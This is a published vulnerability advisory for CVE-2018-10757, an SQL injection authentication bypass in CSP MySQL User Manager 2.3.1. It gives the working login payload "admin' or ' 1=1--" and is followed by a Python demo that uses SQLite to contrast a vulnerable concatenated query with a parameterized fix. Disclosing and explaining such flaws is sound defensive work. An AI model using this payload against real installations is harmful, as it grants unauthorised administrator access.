# Exploit Title: CSP MySQL User Manager 2.3.1 - Authentication Bypass
# Date: 2018-05-04
# Exploit Author: Youssef mami
# Vendor Homepage: https://code.google.com/archive/p/cspmum/
# Software Link: https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/cspmum/cmum-231.zip
# Version: 2.3.1
# Tested on: Linux 2.6.38-11
# CVE : CVE-2018-10757

##################################################################################

SQL Injection Authentication Bypass

Product Page: https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/cspmum/cmum-231.zip
Author(Pentester): Youssef mami (contact@hammamet-services.com)
On Web: www.hammamet-services.com and http://hiservices.blogspot.com ( our blog )
On Social: www.facebook.com/hammamet.informatique and https://twitter.com/hammamet_info

##################################################################################

We just need to enter the admin login like this: admin' or ' 1=1-- and any password :-)

login : admin' or ' 1=1--
password: hammamet informatique services
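
Why the login value above passes a string-built login query, and how parameter binding closes it, shown as an added example that is not code from this advisory or from CSP MySQL User Manager. The query shape, the table and column names and the stored secret are assumptions, and an in-memory SQLite database stands in for MySQL so the block runs offline.

```python
import hmac
import sqlite3

def make_db():
    """Build a constructed demo database (hypothetical schema, not CSP MUM's)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (login TEXT PRIMARY KEY, password TEXT)")
    # Plaintext storage only keeps the demo short; store a salted hash in practice.
    conn.execute("INSERT INTO users VALUES ('admin', 'constructed-demo-secret')")
    return conn

def login_concatenated(conn, login, password):
    """Assumed vulnerable pattern: user input is pasted into the SQL text."""
    sql = ("SELECT login FROM users WHERE login = '" + login +
           "' AND password = '" + password + "'")
    # With the advisory's login value the WHERE clause parses as
    #   login = 'admin' OR (' 1=1--' AND password = '...')
    # so the admin row matches whatever password is sent.
    try:
        return conn.execute(sql).fetchone() is not None
    except sqlite3.Error:
        return False  # input broke the statement syntax

def login_parameterized(conn, login, password):
    """Hardened form: input is bound as data and never parsed as SQL."""
    row = conn.execute(
        "SELECT password FROM users WHERE login = ?", (login,)
    ).fetchone()
    if row is None:
        return False  # no user is literally named "admin' or ' 1=1--"
    return hmac.compare_digest(row[0].encode(), password.encode())

if __name__ == "__main__":
    db = make_db()
    payload = "admin' or ' 1=1--"  # login value quoted in the advisory
    for check in (login_concatenated, login_parameterized):
        print(check.__name__,
              "| advisory login:", check(db, payload, "any password"),
              "| valid login:", check(db, "admin", "constructed-demo-secret"))
```
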